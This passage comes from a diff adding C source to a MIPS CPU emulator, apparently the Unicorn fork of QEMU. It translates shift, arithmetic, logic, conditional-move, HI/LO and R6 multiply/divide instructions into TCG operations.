*/ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + switch (opc) { + case OPC_SLL: + tcg_gen_shli_tl(tcg_ctx, t0, t0, uimm); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + opn = "sll"; + break; + case OPC_SRA: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "sra"; + break; + case OPC_SRL: + if (uimm != 0) { + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + } else { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "srl"; + break; + case OPC_ROTR: + if (uimm != 0) { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); + tcg_gen_rotri_i32(tcg_ctx, t1, t1, uimm); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rt], t1); + tcg_temp_free_i32(tcg_ctx, t1); + } else { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "rotr"; + break; +#if defined(TARGET_MIPS64) + case OPC_DSLL: + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsll"; + break; + case OPC_DSRA: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsra"; + break; + case OPC_DSRL: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsrl"; + break; + case OPC_DROTR: + if (uimm != 0) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + } else { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "drotr"; + break; + case OPC_DSLL32: + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsll32"; + break; + case OPC_DSRA32: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsra32"; + break; + case OPC_DSRL32: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsrl32"; + break; + case OPC_DROTR32: + tcg_gen_rotri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "drotr32"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm); + tcg_temp_free(tcg_ctx, t0); +} + +/* Arithmetic */ +static void 
gen_arith(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "arith"; + + if (rd == 0 && opc != OPC_ADD && opc != OPC_SUB + && opc != OPC_DADD && opc != OPC_DSUB) { + /* If no destination, treat it as a NOP. + For add & sub, we must generate the overflow exception when needed. */ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_ADD: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_add_tl(tcg_ctx, t0, t1, t2); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); + tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "add"; + break; + case OPC_ADDU: + if (rs != 0 && rt != 0) { + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "addu"; + break; + case OPC_SUB: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); + 
tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of different sign, first operand and result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "sub"; + break; + case OPC_SUBU: + if (rs != 0 && rt != 0) { + tcg_gen_sub_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs == 0 && rt != 0) { + tcg_gen_neg_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "subu"; + break; +#if defined(TARGET_MIPS64) + case OPC_DADD: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_add_tl(tcg_ctx, t0, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); + tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dadd"; + break; + case OPC_DADDU: + if (rs != 0 && rt != 0) { + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + 
tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "daddu"; + break; + case OPC_DSUB: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of different sign, first operand and result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dsub"; + break; + case OPC_DSUBU: + if (rs != 0 && rt != 0) { + tcg_gen_sub_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_neg_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "dsubu"; + break; +#endif + case OPC_MUL: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "mul"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Conditional move */ +static void gen_cond_move(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "cond move"; + TCGv t0, t1, t2; + + if (rd == 0) { + /* If no destination, treat it as a NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + t1 = tcg_const_tl(tcg_ctx, 0); + t2 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t2, rs); + switch (opc) { + case OPC_MOVN: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[rd], t0, t1, t2, *cpu_gpr[rd]); + opn = "movn"; + break; + case OPC_MOVZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[rd], t0, t1, t2, *cpu_gpr[rd]); + opn = "movz"; + break; + case OPC_SELNEZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[rd], t0, t1, t2, t1); + opn = "selnez"; + break; + case OPC_SELEQZ: + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[rd], t0, t1, t2, t1); + opn = "seleqz"; + break; + } + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Logic */ +static void gen_logic(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "logic"; + + if (rd == 0) { + /* If no destination, treat it as a NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_AND: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_and_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "and"; + break; + case OPC_NOR: + if (rs != 0 && rt != 0) { + tcg_gen_nor_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_not_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_not_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], ~((target_ulong)0)); + } + opn = "nor"; + break; + case OPC_OR: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "or"; + break; + case OPC_XOR: + if (likely(rs != 0 && rt != 0)) { + tcg_gen_xor_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "xor"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); +} + +/* Set on lower than */ +static void gen_slt(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "slt"; + TCGv t0, t1; + + if (rd == 0) { + /* If no destination, treat it as a NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + switch (opc) { + case OPC_SLT: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, *cpu_gpr[rd], t0, t1); + opn = "slt"; + break; + case OPC_SLTU: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, *cpu_gpr[rd], t0, t1); + opn = "sltu"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Shifts */ +static void gen_shift(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "shifts"; + TCGv t0, t1; + + if (rd == 0) { + /* If no destination, treat it as a NOP. + For add & sub, we must generate the overflow exception when needed. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + switch (opc) { + case OPC_SLLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_shl_tl(tcg_ctx, t0, t1, t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + opn = "sllv"; + break; + case OPC_SRAV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_sar_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "srav"; + break; + case OPC_SRLV: + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); + tcg_gen_shr_tl(tcg_ctx, t0, t1, t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + opn = "srlv"; + break; + case OPC_ROTRV: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, t2, t3, t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + 
tcg_temp_free_i32(tcg_ctx, t3); + opn = "rotrv"; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DSLLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_shl_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsllv"; + break; + case OPC_DSRAV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_sar_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsrav"; + break; + case OPC_DSRLV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_shr_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "dsrlv"; + break; + case OPC_DROTRV: + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); + tcg_gen_rotr_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + opn = "drotrv"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Arithmetic on HI/LO registers */ +static void gen_HILO(DisasContext *ctx, uint32_t opc, int acc, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv **cpu_HI = (TCGv **)tcg_ctx->cpu_HI; + TCGv **cpu_LO = (TCGv **)tcg_ctx->cpu_LO; + const char *opn = "hilo"; + + if (reg == 0 && (opc == OPC_MFHI || opc == OPC_MFLO)) { + /* Treat as NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + if (acc != 0) { + check_dsp(ctx); + } + + switch (opc) { + case OPC_MFHI: +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[reg], *cpu_HI[acc]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], *cpu_HI[acc]); + } + opn = "mfhi"; + break; + case OPC_MFLO: +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[reg], *cpu_LO[acc]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], *cpu_LO[acc]); + } + opn = "mflo"; + break; + case OPC_MTHI: + if (reg != 0) { +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_gpr[reg]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_HI[acc], *cpu_gpr[reg]); + } + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_HI[acc], 0); + } + opn = "mthi"; + break; + case OPC_MTLO: + if (reg != 0) { +#if defined(TARGET_MIPS64) + if (acc != 0) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_gpr[reg]); + } else +#endif + { + tcg_gen_mov_tl(tcg_ctx, *cpu_LO[acc], *cpu_gpr[reg]); + } + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_LO[acc], 0); + } + opn = "mtlo"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s", opn, regnames[reg]); +} + +static inline void gen_r6_ld(DisasContext *ctx, target_long addr, int reg, int memidx, + TCGMemOp memop) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_const_tl(tcg_ctx, addr); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, memidx, memop); + gen_store_gpr(tcg_ctx, t0, reg); + tcg_temp_free(tcg_ctx, t0); +} + +static inline void gen_pcrel(DisasContext *ctx, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_long offset; + target_long addr; + + switch (MASK_OPC_PCREL_TOP2BITS(ctx->opcode)) { + case OPC_ADDIUPC: + if (rs != 0) { + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, 
*cpu_gpr[rs], addr); + } + break; + case R6_OPC_LWPC: + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TESL); + break; +#if defined(TARGET_MIPS64) + case OPC_LWUPC: + check_mips_64(ctx); + offset = sextract32(ctx->opcode << 2, 0, 21); + addr = addr_add(ctx, ctx->pc, offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TEUL); + break; +#endif + default: + switch (MASK_OPC_PCREL_TOP5BITS(ctx->opcode)) { + case OPC_AUIPC: + if (rs != 0) { + offset = ((target_ulong)imm) << 16; + addr = addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rs], addr); + } + break; + case OPC_ALUIPC: + if (rs != 0) { + offset = ((target_ulong)imm) << 16; + addr = ~0xFFFF & addr_add(ctx, ctx->pc, offset); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rs], addr); + } + break; +#if defined(TARGET_MIPS64) + case R6_OPC_LDPC: /* bits 16 and 17 are part of immediate */ + case R6_OPC_LDPC + (1 << 16): + case R6_OPC_LDPC + (2 << 16): + case R6_OPC_LDPC + (3 << 16): + check_mips_64(ctx); + offset = sextract32(ctx->opcode << 3, 0, 21); + addr = addr_add(ctx, (ctx->pc & ~0x7), offset); + gen_r6_ld(ctx, addr, rs, ctx->mem_idx, MO_TEQ); + break; +#endif + default: + MIPS_INVAL("OPC_PCREL"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + } +} + +static void gen_r6_muldiv(DisasContext *ctx, int opc, int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "r6 mul/div"; + TCGv t0, t1; + + if (rd == 0) { + /* Treat as NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case R6_OPC_DIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "div"; + break; + case R6_OPC_MOD: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "mod"; + break; + case R6_OPC_DIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + 
tcg_temp_free(tcg_ctx, t2); + } + opn = "divu"; + break; + case R6_OPC_MODU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "modu"; + break; + case R6_OPC_MUL: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mul"; + break; + case R6_OPC_MUH: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "muh"; + break; + case R6_OPC_MULU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t2); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mulu"; + break; + case R6_OPC_MUHU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rd], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = 
